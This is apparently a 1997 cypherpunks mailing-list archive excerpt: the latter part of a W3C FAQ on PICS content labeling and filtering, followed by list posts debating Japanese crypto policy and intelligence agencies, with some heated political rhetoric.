   on a particularly simple set of labels: a list of URLs to avoid. As
   another example, some firewalls that corporations had introduced for
   security purposes blocked access to certain IP addresses. PICS
   provides a set of technical specifications so that pieces of the
   picture could be provided by different entities, yet still work
   together.
   
   The first and most important distinction that PICS introduced is a
   separation between labeling and filtering. A label describes the
   content of something. A filter makes the content inaccessible to some
   audience. While both labeling and filtering may introduce social
   concerns, the concerns are somewhat different. More generally, there
   are six roles that could all be filled by different entities:
    1. Set labeling vocabulary and criteria for assigning labels
    2. Assign labels
    3. Distribute labels
    4. Write filtering software
    5. Set filtering criteria
    6. Install/run filtering software
       
   PICS itself actually fills none of the six roles listed above! PICS is
   a set of technical specifications that makes it possible for these
   roles to be played by independent entities.
   
   For example, RSACi and SafeSurf have each defined labeling vocabulary
   and criteria for rating. They each wrote down a vocabulary in a
   machine-readable format that PICS specifies. RSACi has four categories
   in its vocabulary, language, nudity, sex, and violence; SafeSurf has
   more categories. Because they write down their vocabularies in the
   PICS format, label distribution software (e.g., from IBM and Net
   Shepherd) and filtering software (e.g., from Microsoft, IBM, and
   others) can process labels based on those vocabularies. Even though
   RSACi and SafeSurf have each specified a labeling vocabulary and
   criteria for assigning labels, neither of them actually assigns
   labels: they leave it up to the authors of documents to apply to
   criteria to their own documents, or self-label as PICS documents call
   it. Other services, such as CyberPatrol and Net Shepherd, take on both
   of the first two roles, choosing the labeling vocabulary and employing
   people to actually assign labels.
   
                             Questions and Answers
                                       
                               What PICS Enables
                                       
  Can PICS be used for more than just content filtering?
  
   Yes. While the motivation for PICS was concern over children accessing
   inappropriate materials, it is a general "meta-data" system, meaning
   that labels can provide any kind of descriptive information about
   Internet materials. For example, a labeling vocabulary could indicate
   the literary quality of an item rather than its appropriateness for
   children. Most immediately, PICS labels could help in finding
   particularly desirable materials (see, for example, NetShepherd's
   label-informed Alta Vista search), and this is the main motivation for
   the ongoing work on a next generation label format that can include
   arbitrary text strings. More generally, the W3C is working to extend
   Web meta-data capabilities generally and is applying them specifically
   in the following projects:
   
   Digital Signature Project
          coupling the ability to make assertions with a cryptographic
          signature block that ensures integrity and authenticity.
          
   Intellectual Property Rights Management
          using a meta-data system to label Web resources with respect to
          their authors, owners, and rights management information.
          
   Privacy (P3)
          using a meta-data system to allow sites to make assertions
          about their privacy practices, and for users to express their
          preferences for the type of interaction they want to have with
          those sites.
          
   Regardless of content control, meta-data systems such as PICS are
   going to be an important part of the Web, because they enable more
   sophisticated commerce (build and manage trust relationships),
   communication, indexing, and searching services.
   
     "The promise of digital commerce is that it will allow you to use
     the Internet to purchase the services of the best organic gardening
     advisors or mad cow disease specialists, whether they live in Santa
     Clara or Timbuktu. To do this, you need to do more than verify that
     the person at the other end of the wire is who he says he is. You
     need to assess competence, reliability, judgment. In other words,
     you need a system of branding, but applied much more widely for
     highly specialized and hard-to-evaluate services and products. You
     need value-added services that will not only lead you to the right
     product or service but also rate its quality or otherwise vouch for
     it."
     
     Francis Fukayama
     
     (Forbes ASAP 12/96 p 69)
     
  Does PICS enable censorship?
  
   This seemingly straightforward question, upon closer inspection, turns
   out to be many different questions when asked by different people.
   Many people are concerned about governments assuming one or more of
   the roles described in the answer to the previous question. Others are
   concerned about employers setting filtering rules, abuse of power by
   independent labelers, or a chilling effect on speech even if speech is
   not banned outright. People also employ different definitions of
   censorship. The most expansive definition is, "any action by one
   person that makes otherwise available information unavailable to
   another person." Under this expansive definition, even a parent
   setting filtering rules for a child would count as censorship. PICS
   documents have adopted the more restrictive definition of censorship
   as actions that limit what an individual can distribute, and use the
   term "access controls" for restrictions on what individuals can
   receive. But the distinction blurs if a central authority restricts
   access for a set of people. Finally, people have different definitions
   of "enable." Some would say that PICS enables any application that
   uses PICS-compatible components, while we reserve the term "enables"
   for applications that can easily be implemented with PICS-compatible
   components but could not be easily implemented otherwise.
   
   Given the variety of implicit questions, it doesn't make sense to
   provide a blanket answer to the question of whether PICS enables
   censorship. This FAQ answers many of the specific questions that
   people often mean when they ask the more general question. For
   example, we ask questions about whether PICS makes it easier or harder
   for governments to impose labeling and filtering requirements. If you
   believe there's another specific question that should be addressed,
   please send it to pics-ask at w3.org, for possible inclusion in a later
   version.
   
  Could governments encourage or impose receiver-based controls? Does PICS make
  it easier or harder for governments to do so?
  
   Yes. A government could try to assume any or all of the six roles
   described above, although some controls might be harder than others to
   enforce. As described below, governments could assume some of these
   roles even without PICS, while other roles would be harder to assume
   if PICS had not been introduced. It's important to note that W3C does
   not endorse any particular government policy. The purpose of this FAQ
   is to explain the range of potential policies and to explore some of
   the impacts of those policies on both the climate of intellectual
   freedom and the technical infrastructure of the World Wide Web.
   Potential government policies:
    1. Set labeling vocabulary and criteria. A government could impose a
       labeling vocabulary and require all publishers (in the
       government's jurisdiction) to label their own materials according
       to that vocabulary. Alternatively, a government might try to
       achieve the same effect by encouraging an industry self-policing
       organization to choose a vocabulary and require subscribers to
       label their own materials. Civil liberties advocates in Australia
       are especially concerned about this (see The Net Labeling
       Delusion). PICS makes it somewhat easier for a government to
       impose a self-labeling requirement: without PICS, a government
       would have to specify a technical format for the labels, in
       addition to specifying the vocabulary and criteria, and there
       might not be any filtering software available that could easily
       process such labels.
    2. Assign labels. A government could assign labels to materials that
       are illegal or harmful. This option is most likely to be combined
       with government requirements that such materials be filtered (see
       #5 below) but it need not be; a government could merely provide
       such labels as an advisory service to consumers, who would be free
       to set their own rules, or ignore the labels entirely. If a
       government merely wants to label, and not impose any filtering
       criteria, then PICS again provides some assistance because it
       enables a separation of labeling from filtering. On the other
       hand, a government that wishes to require filtering of items it
       labels as illegal gets little benefit from PICS as compared to
       prior technologies, as discussed below in the question about
       national firewalls.
    3. Distribute labels. A government could operate or finance operation
       of a Web server to distribute labels (a PICS label bureau); the
       labels themselves might be provided by authors or independent
       third parties. Taken on its own, this would actually contribute to
       freedom of expression, since it would make it easier for
       independent organizations to express their opinions (in the form
       of labels) and make those opinions heard. Consumers would be free
       to ignore any labels they disagreed with. Again, since PICS
       separates labeling from filtering, it enables a government to
       assist in label distribution without necessarily imposing filters.
       If combined with mandatory filtering, however, a
       government-operated or financed label bureau could contribute to
       restrictions on intellectual freedom.
    4. Write filtering software. It's unlikely that a government would
       write filtering software rather than buying it; the supplier of
       filtering software probably has little impact on intellectual
       freedom.
    5. Set filtering criteria. A government could try to impose filtering
       criteria in several ways, including government-operated proxy
       servers (a national intranet), mandatory filtering by service
       providers or public institutions (e.g., schools and libraries), or
       liability for possession of materials that have been labeled a
       particular way. In some ways, by enabling independent entities to
       take on all the other roles, PICS highlights this as the primary
       political battleground. Each national and local jurisdiction will
       rely on its political and legal process to answer difficult policy
       questions: Should there be any government-imposed controls on what
       can be received in private or public spaces? If so, what should
       those controls be? Most kinds of mandatory filters could be
       implemented without PICS. One potential policy, however, mandatory
       filtering based on labels provided by non-government sources,
       would have been difficult to impose without PICS.
    6. Install/run filters. A Government could require that filtering
       software be made available to consumers, without mandating any
       filtering rules. For example, a government could require that all
       Internet Service Providers make filtering software available to
       its customers, or that all PC browsers or operating systems
       include such software. Absent PICS, governments could have imposed
       such requirements anyway, since proprietary products such as
       SurfWatch and NetNanny are available.
       
  Since PICS makes it easier to implement various kinds of controls, should we
  expect there to be more such controls overall?
  
   Yes; all other things being equal, when the price of something drops,
   more of it will be consumed.
   
  Does PICS encourage individual controls rather than government controls?
  
   Yes; for example, a national proxy-server/firewall combination that
   blocks access to a government-provided list of prohibited sites does
   not depend on interoperability of labels and filters provided by
   different organizations. While such a setup could use PICS-compatible
   technology, a proprietary technology provided by a single vendor would
   be just as effective. Other controls, based on individual or local
   choices, benefit more from mixing and matching filtering software and
   labels that come from different sources, which PICS enables. Thus,
   there should be some substitution of individual or local controls for
   centralized controls, although it is not obvious how strong this
   substitution effect will be. In both Europe and Australia initial
   calls for centralized controls gave way to government reports calling
   for greater reliance on individual recipient controls; the end results
   of these political processes, however, are yet to be determined.
   
                                   Labeling
                                       
  Does it matter whether labels are applied to IP addresses or to URLs?
  
   An IP address identifies the location of a computer on the Internet. A
   URL identifies the location of a document. To simplify a little, a URL
   has the form http:///. A web browser first
   resolves (translates) the domain-name into an IP address. It then
   contacts the computer at that address and asks it to send the
   particular filename. Thus, a label that applies to an IP address is a
   very broad label: it applies to every document that can be retrieved
   from that machine. Labeling of URLs permits more flexibility:
   different documents or directories of documents can be given different
   labels.
   
   This difference of granularity will, naturally, have an impact on
   filtering. Filters based on IP addresses will be cruder: if some but
   not all of the documents available at a particular IP address are
   undesirable, the filter will have to either block all or none of those
   documents. PICS, by contrast, permits labeling of individual URLs, and
   hence permits finer grain filters as well.
   
Self-labeling

  Does PICS make author self-labeling more effective?
  
   Yes. Without a common format for labels, authors could not label
   themselves in a way that filtering programs could make use of. PICS
   provides that format.
   
  Does PICS make a government requirement of self-labeling more practical to
  implement?
  
   It enables such a requirement to have more impact. A government
   requirement of self-labeling would have little impact if the labels
   were not usable by filtering programs. PICS provides the common format
   so that filtering software from one source can use labels provided by
   other sources (authors in this case).
   
  Does self-labeling depend on universal agreement on a labeling vocabulary and
  criteria for assigning labels to materials?
  
   Although universal agreement is not necessary, there does need to be
   some harmonization of vocabulary and labeling criteria, so that labels
   provided by different authors can be meaningfully compared.
   
  Does PICS make it easier for governments to cooperate in imposing
  self-labeling requirements?
  
   Yes. PICS provides a language-independent format for expressing
   labels. If governments agreed on a common set of criteria for
   assigning labels, the criteria could be expressed in multiple
   languages, yet still be used to generate labels that can be compared
   to each other.
   
  Is it effective for (some) authors to label their own materials as
  inappropriate for minors? What about labeling appropriate materials?
  
   Both kinds of labeling could be effective, but only if a high
   percentage of the materials of a particular type are labeled. If the
   inappropriate materials are labeled, then a filter can block access to
   the labeled items. If the appropriate materials are labeled, then a
   filter can block access to all the unlabeled items.
   
Third-party labeling

  Can an organization I dislike label my web site without my approval?
  
   Yes. Anyone can create a PICS label that describes any URL, and then
   distribute that label to anyone who wants to use that label. This is
   analogous to someone publishing a review of your web site in a
   newspaper or magazine.
   
  Isn't there a danger of abuse if a third-party labeler gets too powerful?
  
   If a lot of people use a particular organization's labels for
   filtering, that organization will indeed wield a lot of power. Such an
   organization could, for example, arbitrarily assign negative labels to
   materials from its commercial or political competitors. The most
   effective way to combat this danger is to carefully monitor the
   practices of labeling services, and to ensure diversity in the
   marketplace for such services, so that consumers can stop using
   services that abuse their power.
   
Other Social Concerns About Labeling

  Why did PICS use the term "label", with all of its negative associations?
  
   PICS documents use the term "label" broadly to refer to any
   machine-readable information that describes other information. Even
   information that merely classifies materials by topic or author
   (traditional card catalog information) would qualify as labels if
   expressed in a machine-readable format. The PICS developers recognized
   that the term "label" has a narrower meaning, with negative
   connotations, for librarians and some other audiences, but it was the
   most generic term the PICS creators could find without reverting to
   technical jargon like "metadata."
   
   In media with centralized distribution channels, such as movies,
   labeling and filtering are not easily separated. For example, unrated
   movies are simply not shown in many theaters in the USA. In addition
   to its technical contribution, PICS makes an intellectual contribution
   by more clearly separating the ideas of labeling and filtering. Many
   of the negative connotations associated with "labeling" really should
   be associated with centralized filtering instead. There are, however,
   some subtle questions about the impact of labeling itself, as
   articulated in the next two questions.
   
  Does the availability of labels impoverish political discussions about which
  materials should be filtered?
  
   Matt Blaze (personal communication) describes this concern with an
   analogy to discussions at local school board meeting about books to be
   read in a high school English class. Ideally, the discussion about a
   particular book should focus on the contents of the book, and not on
   the contents of a review of the book, or, worse yet, a label that says
   the book contains undesirable words.
   
   There will always be a tradeoff, however, between speed of
   decision-making and the ability to take into account subtleties and
   context. When a large number of decisions need to be made in a short
   time, some will have to be made based on less than full information.
   The challenge for society, then, will be to choose carefully which
   decisions merit full discussion, in which case labels should be
   irrelevant, and which decisions can be left to the imperfect summary
   information that a label can provide. The following excerpt from
   Filtering the Internet summarizes this concern and the need for
   eternal vigilance:
   
     "Another concern is that even without central censorship, any
     widely adopted vocabulary will encourage people to make lazy
     decisions that do not reflect their values. Today many parents who
     may not agree with the criteria used to assign movie ratings still
     forbid their children to see movies rated PG-13 or R; it is too
     hard for them to weigh the merits of each movie by themselves.
     
     Labeling organizations must choose vocabularies carefully to match
     the criteria that most people care about, but even so, no single
     vocabulary can serve everyone's needs. Labels concerned only with
     rating the level of sexual content at a site will be of no use to
     someone concerned about hate speech. And no labeling system is a
     full substitute for a thorough and thoughtful evaluation: movie
     reviews in a newspaper can be far more enlightening than any set of
     predefined codes."
     
  Will the expense of labeling "flatten" speech by leaving non-commercial
  speech unlabeled, and hence invisible?
  
   This is indeed a serious concern, explored in detail by Jonathan
   Weinberg in his law review article, Rating the Net. The following
   excerpt from Filtering the Internet acknowledges that materials of
   limited appeal may not reach even the audiences they would appeal to,
   but argues that labeling is merely a symptom rather than a cause of
   this underlying problem:
   
     "Perhaps most troubling is the suggestion that any labeling system,
     no matter how well conceived and executed, will tend to stifle
     noncommercial communication. Labeling requires human time and
     energy; many sites of limited interest will probably go unlabeled.
     Because of safety concerns, some people will block access to
     materials that are unlabeled or whose labels are untrusted. For
     such people, the Internet will function more like broadcasting,
     providing access only to sites with sufficient mass-market appeal
     to merit the cost of labeling.
     
     While lamentable, this problem is an inherent one that is not
     caused by labeling. In any medium, people tend to avoid the unknown
     when there are risks involved, and it is far easier to get
     information about material that is of wide interest than about
     items that appeal to a small audience."
     
                                   Filtering
                                       
  Does PICS make national firewalls easier to implement?
  
   No, but an effective national firewall would make it possible for a
   government to impose PICS-based filtering rules on its citizens. A
   firewall partitions a network into two components and imposes rules
   about what information flow between the two components. The goal of a
   national firewall is to put all the computers in the country into one
   component, and all computers outside the country into the other
   component. This is difficult to do, especially if people deliberately
   try to find out connections (e.g., telephone lines) between computers
   inside the country and those outside the country. Given a successful
   partition, however, PICS could be used to implement the filtering
   rules for a firewall. In particular, the government could identify
   prohibited sites outside the country that people inside the country
   could not access; such a filtering could be implemented based on
   PICS-formatted labels or, without relying on PICS-compatible
   technology, with a simple list of prohibited URLs.
   
  Does PICS enable ISP compliance with government requirements that they
  prohibit access to specific URLs?
  
   ISP compliance with government prohibition lists is already practical,
   even without PICS. It would also be possible to comply using
   PICS-based technologies. PICS does make it easier for ISPs to comply
   with a government requirement to block access to sites labeled by
   non-governmental entities (including those that are self-labeled by
   the authors of the sites).
   
  Are proxy-server based implementations of PICS filters compatible with the
  principle of individual controls?
  
   Yes. PICS enables mixing and matching of the five roles. In
   particular, a service provider could install and run filtering
   software on a proxy server, but allow individuals to choose what
   filtering rules will be executed for each account. AOL already offers
   a primitive version of this idea, not based on PICS; parents can turn
   the preset filtering rules on or off for each member of the family.
   
  Are client based implementations of PICS filters usable only for individual
  controls?
  
   No. Governments could require the use of filters on clients. The city
   of Boston, for example, requires public schools to install a
   client-based filtering product on all computers with Internet access,
   and requires public libraries to install a client-based filtering
   product on all computers designated for children.
   
  Does my country have a right to filter what I see?
  
   W3C leaves this question to the political and legal processes of each
   country. Some people argue that unrestricted access to information is
   a fundamental human rights question that transcends national
   sovereignty. W3C has not adopted that position.
   
  Does my employer have a right to filter what I see?
  
   W3C leaves this question to the political and legal processes of each
   country.
   
                       W3C's Roles and Responsibilities
                                       
  How does W3C view its role in policy debates about intellectual freedom?
  
   W3C's mission is to "realize the full potential of the Web." The
   following two points are taken from a talk by Jim Miller at the WWW6
   conference:
     * We wish to provide tools which encourage all cultures to feel free
       to use the Web while maintaining an inter-operable network
       architecture that encourages diversity without cultural
       fragmentation or domination
     * We provide feedback to policy makers regarding what is technically
       possible, how effective the technology may be in satisfying policy
       requirements, and the possible unintended consequences of proposed
       policies
       
   Thus, for example, when discussing the CDA-type legislation with
   government officials in the U.S. or abroad, it is appropriate for W3C
   to point out that sender-based restrictions are not likely to be
   effective at keeping all materials of a particular kind away from
   children, and that there could be unintended consequences in terms of
   chilling free speech or keeping the Web from reaching its full
   potential as a medium for communication and cultural exchange. W3C
   does not, however, debate with government officials about their
   perceived policy requirements. For example, Germany has a policy
   requirement of restricting access to hate speech while the U.S. does
   not: W3C does not try to convince either country that the other
   country's choice of policy requirements is better.
   
  Why does the CACM article suggest that governments might use blocking
  technology?
  
   Some people(see The Net Labeling Delusion) have criticized the
   following paragraph from the CACM article on PICS:
   Not everyone needs to block reception of the same materials. Parents
       may not wish to expose their children to sexual or violentimages.
       Businesses may want to prevent their employees from visiting
       recreational sites during hours of peak network usage. Governments
       may want to restrict reception of materials that are legal in
       other countries but not in their own. The off button (or
       disconnecting from the entire Net) is too crude: there should be
       some way to block only the inappropriate material.
       Appropriateness, however, is neither an objective nor a universal
       measure. It depends on at least three factors:
       
   1. The supervisor: parenting styles differ, as do philosophies of
       management and government.
       2. The recipient: whats appropriate for one fifteen year old may
       not be for an eight-year-old, or even all fifteen-year-olds.
       3. The context: a game or chat room that is appropriate to access
       at home may be inappropriate at work or school.
       
   The main point of this section is to underscore the fact that people
   disagree about what materials are appropriate in what contexts. This
   point is illustrated at several levels of granularity: invidual
   children, organizations, and governments. The critcism focuses on the
   mention of possible government blocking, which did not appear in an
   earlier draft of the paper. We believe the example about differences
   in laws between countries is useful in explaining why there is a need
   for flexible, receiver-based controls rather than the kind of
   sender-based controls (e.g., the CDA) that most policy discussions
   were focusing on at the time.
   
   The objection to the use of this example rests on an argument that
   governments should never designate any content as illegal. That
   argument is not widely accepted (in the U.S., for example, "obscenity"
   laws have been deemed constitutional, even though the CDA's
   "indecency" provisions were not). A more widely held position is that
   governments should not restrict political materials as a means of
   controlling their citizens. W3C leaves discussions about which
   materials should be illegal in a particular country to the political
   realm rather than the technological realm. W3C does, however, point
   out to policy makers, however, that it's not necessary to make
   materials illegal if they are offensive to some people but not others:
   end-user controls are a more flexible method of handling such
   materials.
   
  Could W3C have controlled the uses of PICS by licensing the technology?
  
   Licensing such a technology was not considered to be a feasible option
   during the time of the CDA. Not only would it have undercut the
   "neutrality" and appeal of the technology, the W3C then would have had
   to be in the position of determining who should and should not use it;
   this is not a role the W3C is competent to play.
   
  Is the W3C promoting the development of PICS into proxy server products?
  
   Yes. W3C is pleased that IBM has introduced a proxy server that can
   filter based on PICS labels, and encourages the development of other
   PICS-compatible servers. As discussed above, filter processing can be
   centralized at a proxy server while still permitting individuals to
   choose the filtering rules.
   
  What can I do now to promote uses of PICS that promote, rather than harm,
  intellectual freedom?
  
   In addition to acting in the political arena, it would probably be
   helpful to implement positive uses of labels, such as searching
   applications. It is surpassingly difficult for people unfamiliar with
   computers to imagine new applications. By building prototypes and
   demonstrating them, it may be possible to focus policy-makers'
   energies on those uses of technology that accord with your political
   values.
   
  What else can I read about labeling, filtering, and intellectual freedom?
  
    Governments
    
     * Australian Broadcast Authority report on its investigation into
       on-line services
     * European Parliament Green Paper: the Protection of Minors and
       Human Dignity in Audiovisual and Information Services
     * European Union Communication on illegal and harmful content on the
       Internet
     * Report of European Commission Working party on illegal and harmful
       content on the internet
     * Working Party Report
     * European Commission Forum for Exchange of Information on Internet
       Best Practices
     * Singapore Internet Regulations
       
    Media
    
     * Good Clean PICS: The most effective censorship technology the Net
       has ever seen may already be installed on your desktop (Simson
       Garfinkel in HotWired: February 1997)
     * Labels and Disclosure - Release 1.0 by Esther Dyson
     * MSNBC four-part series (October 1996)
          + Part 1: Censorship debate focuses on filters
          + Part 2: PICS adds new dimension to Web
          + Part 3: Internet watchdogs split over PICS
          + Part 4: Filters aren't a black-and-white issue
       
    Other Organizations
    
     * EFF: Public Interest Principles for Online Filtration, Ratings and
       Labeling Systems
     * CIEC: Citizens Internet Empowerment Coalition
     * ACLU CyberLiberties Campaign
     * ALA white paper (need link)
       
    Individuals
    
     * Rating the Net. Jonathan Weinberg. Hastings Communications and
       Entertainment Law Journal, Vol. 19, No. 2, pp. 453-482. (A
       balanced but critical academic's look at rating systems and their
       legal and social impact.)
     * The Campaign for Internet Freedom (anti-labeling/filtering web
       site in UK)
     * The Net Labeling Delusion (anti-labeling/filtering web site in
       Australia)
     * Fight-censorship mailing lists (Declan McCullagh's moderated and
       unmoderated lists; occasional discussion of PICS and related
       technologies).










From rwright at adnetsol.com  Sun Aug  3 10:32:56 1997
From: rwright at adnetsol.com (Ross Wright)
Date: Mon, 4 Aug 1997 01:32:56 +0800
Subject: spam is good for you
Message-ID: <199708031725.KAA04724@adnetsol.adnetsol.com>



> : slogan so far is "I may disagree with every spam you send, but : I
> will defend to the death your right to spam it. --Voltaire".

I need one.  I've got a few sources for 3x - 5x shirts.  Let me know 
if you need those sources.

Ross

=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: (408) 259-2795






From tcmay at got.net  Sun Aug  3 10:37:07 1997
From: tcmay at got.net (Tim May)
Date: Mon, 4 Aug 1997 01:37:07 +0800
Subject: Tim Speaks the Truth / Re: Joichi Ito as a Junior Policeman
In-Reply-To: <199708031231.VAA00231@eccosys.com>
Message-ID: 




Unlike "Toto," who claims to be "Truthmonger," I speak the truth.

At 5:12 AM -0700 8/3/97, Joichi Ito wrote:

>so they probably are pretty militaristic), Japan does not have the
>equivalent of the NSA. It really is in Japanese national security interests

And what of Chobetsu?

Cf. Richelson's books on the world's intelligence agencies for discussion
of Japan's version of the NSA.

I also had a discussion with an NHK crew about Chobetsu and the coopeative
spying arrangements at the USAF base at Misawa. The NHK folks seemed to get
nervious at what I was openly discussing with them, and averred that such
things are rarely spoken of in Japan, at least not as openly as I was
speaking of them. (I showed them the sections Richelson had on Misawa, and
Seymour Hersh's revelations about the 6920th and the Naval Security Group,
Task Force 59, and complicity in the offing of Gough Whitlam of Australia.)

Wise up, Joichi. You live in society more totalitarian than anything we
fear. Japanese citizen-units under video surveillance and afraid to speak
out. And surveillance and espionage technology deployed by your fascist
governmet--a term I mean literally, not casually--will worsen things
dramatically.

The only "cooperation" with them is to seek their annihilation.

And nothing but mischief will come out any meetings with government on
"crypto policy," as their goals can never be our goals. At least in the
U.S., despite obvious flaws, we have a "Congress shall make no law"
provision which _tends_ to make government meddling in speech, such as
meddling in crypto, more difficult.


--Tim May








>to consider minimizing risk by distributing it since they obviously do not
>have the ability to control it in the way that the US does. Anyone who
>has been following the statements by the Japanese at the OECD should
>note that Japan has alway lagged behind in supporting government control
>of crypto. In addition (although this article is very seldom sited in actual
>cases) the Japanese constitution provides for privacy of communications
>for citizens. Also, most of the crypto technology is held in private
>companies.
>
>Really, what I am try to do is two things:
>
>1) Make sure that Japan makes the right decision about crypto policy so
>that they do no stifle commercial development of crypto or put at risk
>national and individual security/privacy by implementing a weak system because
>of political pressure or domestic surveilance requirements.
>
>2) Make sure that Japan does not repeat the US "Hacker Crackdown" and
>more recent Australian crackdowns which I think can cause a rift between
>hackers and society. Right now I think the risk of weak security from
>the point of view of IWar and just plain network failure is much more
>important
>than cracking down on hackers/crackers. I'm trying to head off such
>"crackdown"
>movements by trying to put threats and risks into perspective at the National
>Security level and take the focus away from the activities of hackers who
>I think can help improve security and lower risks in the long term.
>
>As for Tim's message... I keep worrying (when I am in Japan) that I'm too
>radical, so it's nice to hear from someone who is really hardcore to put
>a wimp like me in my place. ;-P
>
>I guess I still believe in trying to redirect the process of government before
>"dropping out"... I'm not making it any easier for the "bad guys" giving them
>my opinion and I can alway "drop out" when I think no one's listening
>anymore...
>
>Anyway, I'm going to stop writing now before all of the government people
>reading this list decide to put me in their kill file. Then no one will be
>listening
>to me. ;-P
>
>
>- Joi
>
>P.S. I wrote an article in the Daily Yomiuri about a year ago that outlines
>where I am coming from. Please take a look if you are interested. The
>Daily Yomiuri is a national Japanese newspaper.
>
>
>--
>Finger jito at nsm.eccosys.com or jito at garage.co.jp for PGP Key
>Fingerprint for RSA PGP Key ID 0x0EE23A2D
>0D3A 7AAA 3DA8 E7B3  3AF1 C6FA B7ED D834
>Fingerprint for DSS/Diffie-Hellman PGP Key ID 0x2D9461F1
>58F3 CA9A EFB8 EB9D DF18  6B16 E48D AF2A 2D94 61F1
>Home Page: http://domino.garage.co.jp/jito/joihome.nsf
>To subscribe to my personal mailing list send mailto:friends-subscribe at ito.com


There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From tcmay at got.net  Sun Aug  3 13:11:01 1997
From: tcmay at got.net (Tim May)
Date: Mon, 4 Aug 1997 04:11:01 +0800
Subject: Tim Speaks the Truth / Re: Joichi Ito as a Junior Policeman
In-Reply-To: <199708031231.VAA00231@eccosys.com>
Message-ID: 




To follow-up on my comments about Chobetsu, the Japanese SIGINT/COMINT
agency, there's a wealth of information in various places. In addition to
the books by Richelson and Hersh that I mentioned, Web searches reveal a
bunch of stuff. (And my own Cyphernomicon, now 3 years old, has material on
it, too.)


At 10:31 AM -0700 8/3/97, Tim May wrote:

>At 5:12 AM -0700 8/3/97, Joichi Ito wrote:
>
>>so they probably are pretty militaristic), Japan does not have the
>>equivalent of the NSA. It really is in Japanese national security interests
>
>And what of Chobetsu?
>
>Cf. Richelson's books on the world's intelligence agencies for discussion
>of Japan's version of the NSA.
>
>I also had a discussion with an NHK crew about Chobetsu and the coopeative
>spying arrangements at the USAF base at Misawa. The NHK folks seemed to get
>nervious at what I was openly discussing with them, and averred that such
>things are rarely spoken of in Japan, at least not as openly as I was
>speaking of them. (I showed them the sections Richelson had on Misawa, and
>Seymour Hersh's revelations about the 6920th and the Naval Security Group,
>Task Force 59, and complicity in the offing of Gough Whitlam of Australia.)

In Japan it is apparently the despised "anarchist" organizations which are
active in exposing the extent of COMINT surveillance of Japanese
corporations and citizens, so the nervousness of the NHK crew is
understandable. Being linked in any way to the Aum cult is a serious matter
in an "anti-terrorism" and "anti-anarchist" regime.

Here's an interesting article from: http://www.twics.com/~anzu/14-JCIA.html

My comments or emphasis are in .


--begin quoted material--
By

>From Tokyo Observer x

It is not yet clear why information was leaked to the New York Times,
once in October 1994, and a second time one year later, revealing facts
concerning CIA involvement in Japanese politics and in trade talks
between the two countries. What is clear, however, is that one of the
major end results of the CIA leaks, whether intentional or not, may be
a strengthening of the Japanese intelligence apparatus. For example, in
response to the second report, an anonymous Japanese foreign
ministry official told the Daily Yomiuri that it was not surprising that
the U.S. had spied on Japan because there was no anti-spying
legislation in Japan. Such moves to strengthen the intelligence
apparatus are not new, of course, but they have become much more
forceful in recent years. In October, 1994, soon after the first CIA
leak, two articles appeared nearly simultaneously in the Japan Times
and Time magazine concerning the possible formation of a new
intelligence "superagency." Ueno Teruaki, in the Japan Times, quoted



"Japanese spies" as saying that "it is in the nation's interest to get
independent assessments of situations instead of accepting the
offerings of allies." And in the Time article, Nishihara Masashi, a
research director at the National Institute of Defense Studies was
quoted as saying, "we need more independent intelligence if we are
going to play an expanded role in international affairs." In the wake of
the second leak in October 1995, these calls have only grown more
strident, and this leaves open the possibility that elements within the
U.S. administration may have hoped to use the revelations as a lever
to push Japan into bearing a greater share of its "defense burden."
Conservative public opinion magazines such as Bungei Shunju and
SAPIO have published papers, typically light in information content
but heavy in rhetoric, decrying Japan's lack of ability to defend itself
in the coming "intelligence wars." Conservative critics have renewed
calls for the passage of some sort of "anti-espionage" legislation, an
issue that was a favorite of Nakasone Yasuhiro during his
administration in the early 1980s (though Nakasone was unable to get
the law passed). The typical claim of these commentators is that
Japan's intelligence capabilities are in a crippled state, and that (though
this is generally unstated) when relations with the U.S. deteriorate,
Japan will be left vulnerable. These calls have, in fact, led to concrete
plans to unify them into a single super agency modeled on the CIA in
the United States. Japan's "Crippled" Intelligence It would be a
mistake, however, to take at face value the claims that Japan's
intelligence-gathering capabilities are "crippled." There are, in fact, a
whole series of offices that deal with such matters, though it is true
that they are (like most Japanese bureaucratic functions) divided
between agencies with conflicting interests, who may at times be more
interested in guarding their own territories than in doing any real
work. At present, Japan's main central official intelligence-gathering
agency is the so-called Naicho, a small section of the Prime Minister's
Office staffed by some 80 personnel who analyze information from
abroad. Proponents of a strengthened apparatus claim that this group
is basically ineffectual, and spends most of its energy having outside
researchers and professors translate newspaper articles and official
documents from abroad. It is supposed to act as a coordinating agency
for other groups in the government, but, the critics say, it does not. In
a recent issue of Jiyu Ishi, an anarchist publication, however, one




author claimed that this office is currently being strengthened to
conduct surveillance on citizen activists. The two largest government
sections that are involved in intelligence are the Public Security
Investigation Agency (Koancho) - which is mainly involved in
counter-espionage - and the different intelligence sections of the
Defense Agency and Self-Defense Forces, in particular the group
called Chobetsu, with some 1,100 personnel, under the Joint Chiefs
of Staff, which analyzes radio and other transmissions in and around
Japan. There are also sections within the Foreign Ministry, MITI




(through its external trade organization, JETRO), the National Police
Agency and the Metropolitan Police Department that deal with
intelligence work, though on a smaller scale. Attention has recently
focused on the Koancho and Chobetsu, the two largest agencies, as
they are currently jockeying for position in the new "superagency" that
many are calling for. The Koancho, for its part, was set up in 1952 as
an agency to investigate and control internal subversion, and its



activities focus mainly on the far left and right, as well as the Japan
Communist Party, which was its main target during its early years. In
addition, it is probably the single group in Japan that is most
responsible for surveillance of resident Koreans, as statements made
by sources within the Koancho almost invariably point to how "North
Korea is scheming against Japan." At present, it is focusing its
surveillance on Aum Shinrikyo, partly in a move to gain increased
legitimacy. It is staffed by some 1,800 investigators. The New
"Superagency" The Chobetsu, for its part, is part of the Self-Defense
Forces, so its main focus is on military intelligence. Its main targets



are, naturally, the Korean peninsula, China, and Russia. There are
plans, however, which have not been well carried in the mainstream
press (though they are not in reality secret) to unite the different
groups within the defense community into a new "superagency"
which would rival the CIA. In next year's budget plan, funds have
actually been appropriated for the construction of a new headquarters
